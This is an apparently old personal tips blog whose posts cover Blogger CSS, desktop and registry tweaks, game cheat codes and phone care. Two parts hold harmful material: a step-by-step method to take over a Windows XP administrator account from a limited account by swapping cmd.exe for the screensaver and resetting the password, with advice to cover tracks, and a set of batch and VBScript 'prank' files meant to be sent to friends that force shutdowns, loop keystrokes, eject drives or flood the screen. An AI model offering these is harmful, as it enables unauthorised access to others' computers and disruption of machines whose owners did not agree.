Thursday 26 March, 2009

color combination for www.rajbai.com


shell background          #0c520c
tweet background          #990000
tweet text                     #64fa69
links                               #efff14

Wednesday 25 March, 2009

how hide navbar and powered by Blogger in blogger tempolates

Now it is very easy to hide navbar and powered by Blogger attribution in a blogger tamplete ..
just add this css in template designer--> advanced 

div#navbar {display: none;}
div#Attribution1 {display: none;}
a.home-link {display: none;}

Sunday 22 March, 2009

Translet Any Language


Hi friends Now You can easily translate any language to tour language.click here to go the Google translation page- Click Here!!

Creat Animated Desktop BackGround




hy friends now its time to create a desktop





background with our
animated name. you needs to write this script in Notepad
( Start ==>All Programes ==> Accessories ==>Notepad)
and then save it as-Your Name.html
Now Go to desktop and right click ==> proporties==> Desktop
and now browse for this file and apply.
It is Done.
You Can replace my name mail address with your information.
please copy This script below the line-



________________________________________________________
<html>

<head>
<style>
a:link {font:8pt/11pt verdana; color:red}
a:visited {font:8pt/11pt verdana; color:#4e4e4e}
</style>
<meta HTTP-EQUIV="Content-Type" Content="text-html; charset=Windows-1252">

</head>
<FONT SIZE=100>
<MARQUEE>Govind Soni(gvnd.soni20@gmail.com) (SIKAR)
PHONE NO.-00919783390179</MARQUEE>
<body bgcolor="PINK">


</tr>
</table>
</body>
</html>

------------------------------------------



now open desktop properties ==>Desktop and Browse html file & apply.



Thats Done
__________________________________________


Click Here to mail me Click Here to mail me

MAKE IMAGES Dancing ON INTERNET.

Click Here to Mail me

MAKE IMAGES ON INTERNET DANCE.
A Javascript trick that makes all the images on the site your on float and dance around. :]

You can do this to ANY site with images

OPEN UR BROWSER
OPEN AYN SITE THAT CONTAINS IMAGES
Go to the address bar on top where site name is there eg.www.trickscafe.blogspot.com Delete everything that's there and copy and paste the code below into it, press enter and have fun.

javascript:R=0; x1=.1; y1=.05; x2=.25; y2=.24; x3=1.6; y3=.24; x4=300; y4=200; x5=300; y5=200; DI=document.getElementsByTagName("img"); DIL=DI.length; function A(){for(i=0; i-DIL; i++){DIS=DI[ i ].style; DIS.position='absolute'; DIS.left=(Math.sin(R*x1+i*x2+x3)*x4+x5)+ "px"; DIS.top=(Math.cos(R*y1+i*y2+y3)*y4+y5)+" px"}R++}setInterval('A()',5); void(0);


Click Here to Mail meClick Here to Mail meClick Here to Mail me

 

TRICK TO PUT ur web PAGE ON OUR DESKTOP


TRICK TO PUT ur web PAGE ON OUR DESKTOP
HERE IS A TRICK TO PUT ur web PAGE ON OUR DESKTOP


To put a Web page on your desktop, start by right-clicking on an empty space on the desktop. THEN
Click on "Properties" to open the display properties dialog box.


To add a Web page to ur desktop:

1. Click on the desktop tab in the display properties dialog box

2. Click the "Customize Desktop." button


In the desktop items dialog box, click on the Web tab

The settings on the Web tab allow you to add new Web pages to ur desktop & customize their settings.From this screen, u can add a Web page to your desktop and customize its settings.

TRY IT........

Saturday 21 March, 2009

windows XP Tricks

How to hack windows XP admin password
If you log into a limited account on your target machine and open up a dos prompt
then enter this set of commands Exactly:
cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos
Now what you have just done is told the computer to backup the command program
and the screen saver file, then edits the settings so when the machine boots the
screen saver you will get an unprotected dos prompt with out logging into XP.
Once this happens if you enter this command minus the quotes
"net user password"
If the Administrator Account is called Frank and you want the password blah enter this
"net user Frank blah"
and this changes the password on franks machine to blah and your in.

Have fun
p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Registry Hacking
Display legal notice on startup:
Wanna tell your friends about the do's and dont's in your computer when they login in your absence. Well you can do it pretty easily by displaying a legal notice at system start up.
REGEDIT
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]
"legalnoticecaption"="enter your notice caption"
"legalnoticetext"="enter your legal notice text"
Automatic Administrator Login:
Well here's the trick which you can use to prove that Windows XP is not at all secure as multi-user operating system. Hacking the system registry from any account having access to system registry puts you in to the administrator account.
REGEDIT 4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"AutoAdminLogon"="1"
No Shutdown:
Wanna play with your friends by removing the shutdown option from start menu in their computer.
Just hack it down !!!
Regedit
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
"NoClose"="DWORD:1"
Menu Delays:
Another minor and easy tweak to remove any delay from menus sliding out. For this you will need to use regedit (open regedit by going to Start -> Run..., then typing 'regedit' and pressing enter). The key you need to change is located in HKEY_CURRENT_USERControl PanelDesktop. The actual key is called MenuShowDelay - all you have to do is change the value to 0. Remember, you will have to re-boot your computer for this tweak to take effect.
GPEDIT.MSC And Autoplay
A great tweaking file that comes with XP is gpedit.msc. Go to Start -> Run... and then type in 'gpedit.msc' and press enter. This is effectively the Policies Editor, and it comes in handy often. For example, if you hate CD autoplay like I do and want to permanently disable it, you can use this tool to do so. Just run gpedit.msc, then go to Computer Configuration -> Administrative Templates -> System. In here you can see the value 'Turn Off Autoplay'. Right-click on it and then click 'Properties'.
Increasing options in add/remove programs:
Not a fan of MSN Messenger? don't want Windows Media Player on your system? Fair enough, but if you go to Add/Remove Programs in the Control Panel, by default none of Windows XP's 'built in' programs are visible. it's fairly easy to change, though... just open the file X:\Windows\inf\sysoc.inf (where X: is the drive letter where Windows XP is installed) in Notepad. You should see a section of the file something like this:
[Components]
NtComponents=ntoc.dll,NtOcSetupProc,,4
WBEM=ocgen.dll,OcEntry,wbemoc.inf,hide,7
Display=desk.cpl,DisplayOcSetupProc,,7
Fax=fxsocm.dll,FaxOcmSetupProc,fxsocm.inf,,7
NetOC=netoc.dll,NetOcSetupProc,netoc.inf,,7
iis=iis.dll,OcEntry,iis.inf,,7
com=comsetup.dll,OcEntry,comnt5.inf,hide,7
dtc=msdtcstp.dll,OcEntry,dtcnt5.inf,hide,7
IndexSrv_System = setupqry.dll,IndexSrv,setupqry.inf,,7
TerminalServer=TsOc.dll, HydraOc, TsOc.inf,hide,2
msmq=msmqocm.dll,MsmqOcm,msmqocm.inf,,6
ims=imsinsnt.dll,OcEntry,ims.inf,,7
fp_extensions=fp40ext.dll,FrontPage4Extensions,fp40ext.inf,,7
AutoUpdate=ocgen.dll,OcEntry,au.inf,hide,7
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
RootAutoUpdate=ocgen.dll,OcEntry,rootau.inf,,7
IEAccess=ocgen.dll,OcEntry,ieaccess.inf,,7
This is a list of all components installed at the moment. I've taken the example of MSN Messenger - the program entry called 'msmsgs', third-last line. You can see the word 'hide' highlighted - this is the string which tells Windows not to display the component in the Add/Remove Programs list. Fix this up by simply deleting the word 'hide' like so:msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7
To this:
msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,,7
Now, after restarting, you should be able to see MSN Messenger in the Add/Remove Programs list. If you want to be able to quickly view and remove all components, simply open the sysoc.inf file and do a global find and replace for the word ",hide" and replace it with a single comma ",".
Automatically Kill Programs At Shutdown:
don't you hate it when, while trying to shut down, you get message boxes telling you that a program is still running? Making it so that Windows automatically kills applications running is a snap. Simply navigate to the HKEY_CURRENT_USERControl PanelDesktop directory in the Registry, then alter the key AutoEndTasks to the value 1.
Speeding Up Share Viewing:
This is a great tweak. Before I found it, I was always smashing my head against the table waiting to view shares on other computers. Basically, when you connect to another computer with Windows XP, it checks for any Scheduled tasks on that computer - a fairly useless task, but one that can add up to 30 seconds of waiting on the other end - not good! Fortunately, it's fairly easy to disable this process. First, navigate to HKEY_LOCAL_MACHINE/Software/Microsoft/Windows/Current Version/Explorer/RemoteComputer/NameSpace in the Registry. Below that, there should be a key called {D6277990-4C6A-11CF-8D87-00AA0060F5BF}. Just delete this, and after a restart, Windows will no longer check for scheduled tasks - mucho performance improvement!
Create a Shortcut to Lock Your Computer
Leaving your computer in a hurry but you don't want to log off? You can double-click a shortcut on your desktop to quickly lock the keyboard and display without using CTRL+ALT+DEL or a screen saver. To create a shortcut on your desktop to lock your computer: Right-click the desktop. Point to New, and then click Shortcut. The Create Shortcut Wizard opens. In the text box, type the following: rundll32.exe user32.dll,LockWorkStation Click Next. Enter a name for the shortcut. You can call it "Lock Workstation" or choose any name you like. Click Finish. You can also change the shortcut's icon (my personal favorite is the padlock icon in shell32.dll). To change the icon: Right click the shortcut and then select Properties. Click the Shortcut tab, and then click the Change Icon button. In the Look for icons in this file text box, type: Shell32.dll. Click OK. Select one of the icons from the list and then click OK You could also give it a shortcut keystroke such CTRL+ALT+L. This would save you only one keystroke from the normal command, but it could be more convenient.
Speed up Internet Explorer 6 Favorites
For some reason, the Favorites menu in IE 6 seems to slow down dramatically sometimes--I've noticed this happens when you install Tweak UI 1.33, for example, and when you use the preview tip to speed up the Start menu. But here's a fix for the problem that does work, though it's unclear why: Just open a command line window (Start button -> Run -> cmd) and type sfc, then hit ENTER. This command line runs the System File Checker, which performs a number of services, all of which are completely unrelated to IE 6. But there you go: It works.
Aspi
WinXP does not come with an Aspi layer. So far almost 90% of the problems with WinXP and CD burning software are Aspi layer problems. After installing WinXP, before installing any CD burning software do a few things first: 1. Open up "My computer" and right click on the CD Recorder. If your CD recorder was detected as a CD recorder there will be a tab called "Recording". On this tab uncheck ALL of the boxes. apply or OK out of it and close my computer. 2. Next install the standard Aspi layer for NT. Reboot when asked. That's is. after the reboot you can install any of the currently working CD recording applications with no problems. If using CD Creator do not install direct CD or Take two as they are currently incompatible but Roxio has promised a fix as soon as XP is released.

Hope you enjoyed this document

gvnd.soni20@gmail.com

gta vice city cheats

Cheat List
See the keyboard? Type the cheats (displayed in CAPs) to get the effect. Note that Cap Sense does not apply to the cheats!
THUGSTOOLS ~ Weapon set #1
PROFESSIONALTOOLS ~ Weapon set #2
NUTTERTOOLS ~ Weapon set #3
ASPIRINE ~ Restore health
PRECIOUSPROTECTION ~ Gain/restore armor
ICANTTAKEITANYMORE ~ Kill self
YOUWONTTAKEMEALIVE ~ Increase Wanted Level
LEAVEMEALONE ~ Decrease Wanted Level
FANNYMAGNET ~ Female actors follow player
CERTAINDEATH ~ Tommy smokes a cigarette
DEEPFRIEDMARSBARS ~ Player model changed to fat
PROGRAMMER ~ Player model changed to skinny
STILLLIKEDRESSINGUP ~ Player model changed randomly
CHEATSHAVEBEENCRACKED ~ Player model is Ricardo Diaz
LOOKLIKELANCE ~ Player model is Lance Vance
MYSONISALAWYER ~ Player model is Ken Rosenberg
LOOKLIKEHILARY ~ Player model is Hilary King
ROCKANDROLLMAN ~ Player model is Love Fist rocker #1
WELOVEOURDICK ~ Player model is Love Fist rocker #2
ONEARMEDBANDIT ~ Player model is Phil Cassidy
IDONTHAVETHEMONEYSONNY ~ Player model is Sonny Forelli
FOXYLITTLETHING ~ Player model is Mercedes
PANZER ~ Spawns a Rhino Tank
TRAVELINSTYLE ~ Spawns a Bloodring Banger
GETTHEREQUICKLY ~ Spawns a Bloodring Banger (alternate)
GETTHEREFAST ~ Spawns a Sabre Turbo
GETTHEREVERYFASTINDEED ~ Spawns a Hotring Racer
GETTHEREAMAZINGLYFAST ~ Spawns a Hotring Racer (alternate)
THELASTRIDE ~ Spawns a Romero's Hearse
ROCKANDROLLCAR ~ Spawns a Love Fist Stretch/Limo
RUBBISHCAR ~ Spawns a Trashmaster
BETTERTHANWALKING ~ Spawns a Golf Caddie
BIGBANG ~ Explodes nearby cars
MIAMITRAFFIC ~ Aggressive AI driving on
AHAIRDRESSERSCAR ~ All cars become pink
IWANTITPAINTEDBLACK ~ All cars become black
COMEFLYWITHME ~ Flying cars cheat
GRIPISEVERYTHING ~ Vehicle handling improved
GREENLIGHT ~ All traffic signals green
SEAWAYS ~ Cars hover over water
WHEELSAREALLINEED ~ Only car wheels visible
LOADSOFLITTLETHINGS ~ Some cars have big wheels
HOPINGIRL ~ Actors get into player's current car
ALOVELYDAY ~ Weather sunny
APLEASANTDAY ~ Weather overcast
ABITDRIEG ~ Weather very overcast
CANTSEEATHING ~ Weather foggy
CATSANDDOGS ~ Weather stormy
LIFEISPASSINGMEBY ~ Time compression (speeds up game time)
ONSPEED ~ Time compression (alternate)
BOOOOOORING ~ Time expansion
CHASESTAT ~ Shows Media Level
FIGHTFIGHTFIGHT ~ Actors all attack (riot cheat)
NOBODYLIKESME ~ Actors attack player
CHICKSWITHGUNS ~ Female actors armed
OURGODGIVENRIGHTTOBEARARMS ~ All actors armed
CHASESTAT ~ Show media level (when 2+ stars):
Submitted by Gitaroo-Man, Clerric
Hint: Reduced Felony
If you want to kill cops without receiving a load of wanted stars, use the main blade of a helicopter and angle it so that the blade hits them. You accrue less "wanted points" this way.
Submitted by Farrar
Hint: Instant Health Power-Up
This trick worked in GTA III as well. Drive up next to a hooker and wait. If you're driving a swank enough car, she'll start talking to you. Eventually, she'll get into the car. At this point, drive to a quiet spot and let the magic happen. The car will start rocking, and your "health" will grow from 100 to 125. Your pocketbook will take a hit though. This health-up only works until the next time you die.
Submitted by Dave Z
Hint: Porno Flyers
After you complete the mission that dumps porn flyers all over the city, the flyers will continue to blow around town as long as you're playing the game.
Hint: Free Money From Parking Meters
Drive over parking meters to empty cash into the streets. It's free money!
Submitted by wnagstaklown
Easter Egg: He Sleeps With the Fishes
Get a boat... and go between The "Leaf Links" Golf club and the third island. GO up to the rock and stop your boat get the sniper rifle in the cheat and look down on the rocks you will see a man in boxers with concrete on his feet.
Submitted by sscoolieo
Hint: Enter Golf Course Without Losing Your Weapons
Here is a way to enter the golf course without having your weapons get confiscated. First, take the Comet nearby and drive it next to the fence. Get out and jump onto the car. Jump onto the fence, and then jump onto the second fence at a diagonal angle and drop down past it. You will make it into the golf course with all your weapons. This trick can be useful for the "Four Iron" mission.

Hint: Increase the Tank's Speed
Turn the tank's turrent around so it faces backwards. Now keep firing while accelerating and you will go a lot fasterHint: Buy Companies Wisely
An advantage of buying expensive companies rather than smaller ones first is you can get more money in return. For example, if you buy the Print Works for $70,000, you can get $8,000 dollars a day to make buying the other companies easier. Don't forget that you have to complete a certain mission in the Vercitti Missions before you can purchase companies, and you also need to finish the missions related to those companies.
Submitted by Jason Alder
Hint: Beach Ball
Go to Starfish island. When heading west, go into the first house on the right. In the empty pool there is a beach ball. When you run into it, it will bounce. Bounce it on your head and numbers will appear. (The trick is to always be in the shadow of the ball.)
Submitted by CrimsonPredator
Hint: Scarface Easter Egg
There's a Scarface easter egg in the form of a bloody bathroom and a chainsaw weapon.

Go to the Pay N' Spray at Ocean beach, then go south and take the first left. On your left, you'll see a two story apartment with two sets of stairs on the second floor.

Head up the stairs to the right and you'll see a black doorway. Check out the bathroom in apartment 3c and compare it to the movie.
Submitted by Demion
Hint: "Easter Egg" Easter Egg
Head to the 8-10 VCN Building (the news building) on the west island of Vice City. The news building is by the northern bridge entrance on the west island. You can enter the door of the news building and head up to the roof.

Along with the news chopper, there's an easter egg you can get to. There's another buiding close by, but on an angle with the window closest to the edge of the heliport. Make a sprinting jump through the window and you should see an empty room with an easter egg in the middle.
Submitted by Demion
Hint: Rob the Bank
After you've completed the Malibu mission "The Job", you can rob El Banco Corrupto Grande for some easy money. Walk in and turn right up the stairs. This will earn you a four star wanted level. Walk into the manager's office to get 1/3 of the cash. The rest is in the room with the elevator, on the right side. Then jump off the balcony and run out. To shake the cops, you can turn left to the nearby Pay N' Spray. It's not much, but it's easy cash.
Submitted by tip2may
Hint: Shoot the Moon
The moon changes size when shot at with the Sniper Rifle, just like in GTA 3.
Submitted by aruda3
Hint: Dial the Numbers
Write down the phone numbers you hear on the radio commercials in the game. They all work! Here's a list:
1-866-PILLAGE
1-866-9-BURY ME
1-866-9-SAVE ME
1-866-9-SHADEE
1-866-434-SELF
Submitted by zelldincht13
Easter Egg: Find the Easter Egg
Leap off the corner of the VCTV building toward the nearest building to find a hidden room that contains a secret easter egg.
Hint: See the Village People
Go into the Malibu Club and take a gander at the stage. There, you'll find a reasonable facsimile of the Village People.
Hint: Ammo Trick
If you pick up the regular shotgun at your hidout (from starfish island) and then go out and find the spas or benelli shotgun out in the city, your 50 shells from the regular shotgun will be transfered to the new upgraded gun you picked up. If you were to pick up the upgraded shotgun without doing this you would only recieve 20 or so shells but this way you get roughly 70. This trick works with other guns also that share simular bullets.
Submitted by buzzkillah_3d
Hint: Bullet Proof Cars
Admiral. Also fire-proof, explosion-proof, and collision-proof. Activate the Guardian Angels mission (from Colonel Cortez), and kill the Haitian gang members. The Admiral is the white car Diaz drives in the cut-scene. Deliberately fail the mission by killing Diaz, Lance, or letting the Haitian biker escape with Diaz's money.

Once the mission fails, the Admiral's doors will be unlocked and you can drive it back to the garage of your choice. Naturally, you will need to purchase property that has a garage first.

gvnd.soni20@gmail.com

Mobile Game Cheats

::Gameloft Games::

2006 Real Football
Cheat Mode -> On Menu Screen Press 0417, then press * while playing

2006 Real Football 3D
Cheat Mode -> On Menu Screen Press 0417, then press * while playing, pause the game for more cheat option

America's Army: Special Operations
Unlock Everything -> On Menu Screen Press Up *360
Full Health -> While Playing Press Up *3715
Maximum Power -> While Playing Press Up *372
Complete Mission -> While Playing Press Up *379

American Gangster
Type The Codes While Playing:
Mission Unlocking -> *3970
Immortality On/Off -> Press *3971
Immunity On/Off -> Press *3973
Guns + Ammo -> Press *3974
Earn 10,000$ -> Press *3975
Get A Cab -> Press *3976
Mission Success -> Press *3977
Mission Fail -> Press *3978
Walking Through Walls On/Off -> Press *3979

Asphalt 1 (N-Gage)
Cheats Menu -> Durin Gameplay hold # n pause

Asphalt: Urban GT 2 2D
Unlock Everything & Earn $10,000,000 -> On Menu Screen press 19911

Asphalt 3: Street Rules
Unlock Everything -> On Menu Screen press 21683

Asphalt 3: Street Rules HD
Unlock Everything -> On Location Menu press #13791

Asphalt 4: Elite Racing
Unlock Everything & Active Cheat Mode -> On Menu Screen Press #1379*
Win Race In 1st Place -> During Gameplay Press #1379*
Light Version-> On Menu Screen Press 21683

Big Range Hunting
Unlock Everything -> On The Map Screen Press *1397

Bikini Volleyball
Unlock Everything -> #86421
Win Current Game -> #24764
Lose Current Game -> #948323
Earn 1,000$ -> #97642
Earn 20,000$ -> #12489

Block Breaker Deluxe
On Menu Screen Press *1397* To Activate Cheat Codes & On Island Press #3179# To Unlock Everything
When Playing Game:
Press '0' To Activate Shield
Press '3' To Gain One Life
Press '9' To Earn 1000K

Block Breaker Deluxe 2
Press #*1379# To Activate Cheat Codes On Island Select # To Display Cheat Menu Select Total Unlock
When Playing Game:
Press '0' TO ACTIVATE SHIELD
Press '3' To Gain One Life
Press '9' To Earn 1000K

Christmas Midnight Pool
For Win -> On Menu Screen Press 19731973

Diamond Rush
Cheat Menu -> On World Select Screen press #4772

Driver L.A. Undercover
Unlock Everything -> On Menu Screen Press 64636

Gangstar: Crime City
Type The Codes While Playing:
Mission Unlocking -> press *3970
Immortality -> press *3971
Immunity -> press *3973
All Weapon & Ammo -> press *3974
Earn $10,000 -> press *3975
Get Texas Longhorn -> press *3976
Mission Completed -> press *3977
Mission Failed -> press *3978
Walk Through Everything -> press *3979

Heroes
Unlock all levels -> On Menu Screen Press *#7383
Win current level -> While playing press *#4476
Lose current level -> While playing press *#6422
Enable/disable walking through walls -> While playing press *#7952
Enable/disable high speed -> While playing press *#6454

Horse Riding Academy
Level Select -> On Menu Screen Press **2006

Kevin Pietersen Cricket 07
Press *7913

Kingkong Pinball Game
Control The Ball -> While playing press 789*0#

KO Fighters 2D
Cheat Menu -> On Menu Screen Press *1379

Meteos: Astro Blocks
Complete Level -> While playing press #946

Midnight Bowling 2
press *##**##*

Midnight Hold'em Poker 3D
Unlock Everything -> On Menu Screen press #1379

Midnight Pool
Open cheat-menu - Arrange a ball on a table. Press * when beat on a ball.
Unlock All - On cheat menu, press 5.

Mini Golf Revolution
Unlock All -> Press 747283
Earn $1000 -> Press 26689

New York Nights: Success in the City
Increase Beauty, Health, Humor, Culture, Popularity -> On Secret Code, enter #*#9999#
Increase Beauty, Health, Humor, Culture -> On Secret Code, enter #*#1111#
Increase Popularity -> On Secret Code, enter #*#2222#
Increase Money -> On Secret Code, enter #*#6001999#
Decrease Money -> On Secret Code, enter #*#6002999#
Unlock Mini Game (Waiter) -> On Secret Code, enter #*#4001#
Unlock Mini Game (Bartender) -> On Secret Code, enter #*#4002#
Unlock Mini Game (Singer) -> On Secret Code, enter #*#4003#



Nitro Street Racing 2D
Unlock Everything -> On Menu Screen, press 1379#
To Win Race -> While playing, press 7979*
To Lose Race -> While playing, press 9797*

Pirates of the Seven Seas
Unlock all levels -> On Menu Screen Press 7979
Pirates fly mode on/off -> While Playing Press 9

Platinum Kakuro & Platinum Sudoku
Complete Level -> While Playing, press #13333

Platinum Mahjong
Cheat Mode -> On Menu Screen, press 73911
Complete Level -> While playing, press *04

Prince Of Persia Classic
Unlock all levels -> On Menu Screen 3331

Prince Of Persia: Two Thrones
Unlock all levels -> On Menu Screen Press 7979

Prince Of Persia: Warrior Within
Unlock all levels -> On Menu Screen Press 7979

Pro Golf 2007 feat. Vijay Singh 3D
Open All Tournaments -> On Menu Screen Press *#79.
Earn $1000000 -> On Profile Screen Press *#17
Unlock Money For Shop -> On Menu Screen Press *#1379#. (After that pressed * on shop screen to increase money)
Complete Level -> While in Pause Press *#13

Pro Rally Racing
In Main Menu:
Unlock All Locations & car Press UP, 1, RIGHT, DOWN to s
Press UP, 1, RIGHT, 9 to enable/disable something - your task is to find out what?

Pub Mania
Earn $1,000,000 & Enable Level Selection In Options -> On Menu Screen Press #9137

Real Football Manager
Enable cheat mode -> Press 2, LEFT, LEFT, 6, 2

Rock 'n' Blocks
9130 -> win level
79131 -> unlock free play mode
79132 -> full power
79133 -> change respawn
79134 -> unlock map
79135 -> unlock gallery
79137 -> unlock 'legend' difficulty
1973xy -> jump to level xy

Rayman 3
Skip Level -> Press 9876

Sexy Blocks Cancun Vibes
Activate Cheat Code -> On Menu Screen, press *#1109#
Unlock Everything -> On Menu Screen, press 33333
View Ending Image -> On Menu Screen, press 11111
Infinite Lives -> On Menu Screen, press *#79
Earn $100.000 -> On Menu Screen, press 1973
Complete Level -> While playing, press *#

Sexy Poker 2006
Unlock Everything -> On Menu Screen press 198475

Sexy Poker Susana Reche
Unlock Everything -> On Menu Screen press *139

Sexy Poker Top Models
Unlock Everything -> On Menu Screen press *139

Surf's Up
Unlock Cheat Mode -> #679679
Unlock All Levels -> Press *
Complete Level -> While Playing Game Press *

The OC
Cheat Menu -> On Menu Screen press *2468#

Tom Clancy's Ghost Recon: Jungle Storm (N-Gage)
100% Campaign & All Cheats Unlocked -> On The Profile Screen, hold Right and 0 and press Left Soft Key

Tom Clancy's Rainbow Six: Vegas
Unlock Everything -> On Menu Screen Press Up Up Down Down Left

Tom Clancy's Splinter Cell: Double Agent
Fast Speed -> On Menu Screen, press 060310
Unlock Everything -> On Menu Screen, press 060317
Invincible -> On Menu Screen, press 060318
Complete Level -> On Menu Screen, press 060319

XIII
Carnage Mode -> On Secret Code Press 1984

XIII 2: Covert Identity
Unlock Everything -> On Menu Screen Press *1379
Earn 140 Gold -> At Shop Press *1379

Xtreme Dirt Bike
-> Press *137962#

____________________________________________________________
Other Games:

Bounce (take note only works on s40 ver.)
godmode - Press 787898 at gamin screen

Tony Hawk (N-Gage)
maximum balance(wont fall when doin grinds)
pause n hold c ( cancel) then press 5,4,2,up

Star Wars Episode III
Unlimited Force Power
From the main menu, go to settings(options), then go to codes.
Password : UNLMTDPWR
Effect Infinite Force Power

Doom RPG
At the title screen or while the game is paused slowly press 3666.
Then select "Cheats" option
Cheat 3666: activate the cheat menu
Doom RPG Passwords-Super Secret Password
If you go through the game and collect all the super secret password
clues, you will be able to enter the super secret room which is in level
Password : 2279 (Effect Enter the super secret room)

Bonus Area (In Destroyed Junction)
The Bonus Area is located behind a secret wall. Search the upper-left
walls of the large cave area in the Destroyed Junction. It has a 7-digit
password which happen to be the first seven numbers in the famous
Fibonacci Sequence.

Inside can be found three enemies (Baron, Revanant, Apollyon). The floor
is covered with Berserker and Soul Sphere power-ups, a dog collar, a Flak
Jacket, and large amounts of ammo for every gun.
Password 0112358 (Effect Opens Bonus Room)

Orcs & Elves

Cheat Menu
When in the game goto the Menu and press 3666 slowly on the number pad and
the in game cheat menu will appear.
Cheat 3666 : Opens in-game cheat menu

Tomb Raider Legend levels (symbian)

Wanna levels on tomb raider legenda ??? It"s easy ... Just go to
system/apps/TRL/save.ini ...in this save.ini you just change Lastlevel =
(???) you like... like this :
Rank.1 = 1
Rank.2 = 0
Rank.3 = 0
Rank.4 = 0
Rank.5 = 0
Rank.6 = 0
Rank.7 = 0
Rank.8 = 0
LastLevel = 10
Rank.9 = 0
Language = 0
FirstTime = 0
SFX.Musics = 3
MaxLevel = 1
SFX.Effects = 3



gvnd.soni20@gmail.com

Tips on Mobile Maintenance by Govind Soni

Tips on Mobile Maintenance Looking after your mobile helps to ensure it has a long and productive life. There are 8 easy maintenance tips to help you get the best out of your mobile phone. All of the points below should also apply to your battery, charger and any other accessories.KEEP YOUR MOBILE: Charged: Ensure your battery is fully charged, and then completely run it down before recharging. Recharging too early causes your battery to run out of power more quickly. Secure: For security reasons, enable the PIN on your SIM Card and Phone-lock on your phone to avoid unauthorized used. These security checks will also be activated when the phone is power cycled. You can check with your carrier or the phone manual for the features and also for information on blocking your SIM card and phone IMEI number if the phone is stolen. For more information please see the Security Tips located on the AMTA Lost and Stolen website. Protected: Make sure you use a keypad lock to lock your phone. Unplanned calls can cost a fortune and even though your phone may be in a safe place, such as in a bag, your phone will still get knocked around to a surprising degree. Rough treatment can damage electronic circuit boards so avoid dropping or unnecessarily shaking your phone. Battery: Be safe with your batteries. Use only genuine batteries from your phone manufacturer and only buy from authorized dealers. Going for the cheap option of a counterfeit battery can be dangerous. Clean: Don't use harsh detergents, cleaning solvents or harsh chemicals to clean your phone. Wipe only with a soft cloth. Covered: a protective cover will help repel dust and dirt, and prevent scratches. Make sure the cover you choose is of good quality. Low quality covers with no air pockets can damage you phone by creating humidity inside the cover. Storing your phone: Always store your phone in a dry place. Avoid rain, high humidity and liquids. All of these may contain minerals that could corrode the electronic circuits. At the right temperature: To ensure a long life, keep your phone in a stable temperature. Avoid exposing your phone to liquid and/or exposing your phone to extreme temperature change from hot to cold and vice versa. This might create condensation and damage the phone. Plese contact------------------------------------------------gvnd.soni20@gmail.com---------------------------------------------JOIN SIKAR_SMSsend it to 567678----------------------------------------

10 Notepad tricks to fool ur friends BY GOVIND SONI

10 notepad tricks to fool ur frnds
1>Cycle a message in your friend's computer:Type :
@ECHO off:Beginmsg * Himsg * Are you having fun?msg * I am!msg * Lets have fun together!msg * Because you have been o-w-n-e-dGOTO BEGINSave it as "Anything।BAT" and send it।

2>Convey your friend a lil' message and shut down his / her computer:Type :@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" -sSave it as "Anything.BAT" in All Files and send it.

3>Toggle your friend's Caps Lock button simultaneously:Type :
Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{CAPSLOCK}"loopSave it as "Anything.VBS" and send it.

4>Continually pop out your friend's CD Drive. If he / she has more than one, it pops out all of them!Type :Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loopSave it as "Anything.VBS" and send it.

5>Frustrate your friend by making this VBScript hit Enter simultaneously:Type :Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "~(enter)"loopSave it as "Anything.VBS" and send it.

6>Open Notepad, slowly type "Hello, how are you? I am good thanks" and freak your friend out:Type :WScript.Sleep 180000WScript.Sleep 10000Set WshShell = WScript.CreateObject("WScript.Shell")WshShell.Run "notepad"WScript.Sleep 100WshShell.AppActivate "Notepad"WScript.Sleep 500WshShell.SendKeys "Hel"WScript.Sleep 500WshShell.SendKeys "lo "WScript.Sleep 500WshShell.SendKeys ", ho"WScript.Sleep 500WshShell.SendKeys "w a"WScript.Sleep 500WshShell.SendKeys "re "WScript.Sleep 500WshShell.SendKeys "you"WScript.Sleep 500WshShell.SendKeys "? "WScript.Sleep 500WshShell.SendKeys "I a"WScript.Sleep 500WshShell.SendKeys "m g"WScript.Sleep 500WshShell.SendKeys "ood"WScript.Sleep 500WshShell.SendKeys " th"WScript.Sleep 500WshShell.SendKeys "ank"WScript.Sleep 500WshShell.SendKeys "s! "Save it as "Anything.VBS" and send it.

7>Frustrate your friend by making this VBScript hit Backspace simultaneously:Type :MsgBox "Let's go back a few steps"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loopSave it as "Anything.VBS" and send it.

8>Hack your friend's keyboard and make him type "You are a fool" simultaneously:Type :Set wshShell = wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "You are a fool."loopSave it as "Anything.VBS" and send it.

9>Open Notepad continually in your friend's computer:Type :@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO topSave it as "Anything.BAT" and send it.


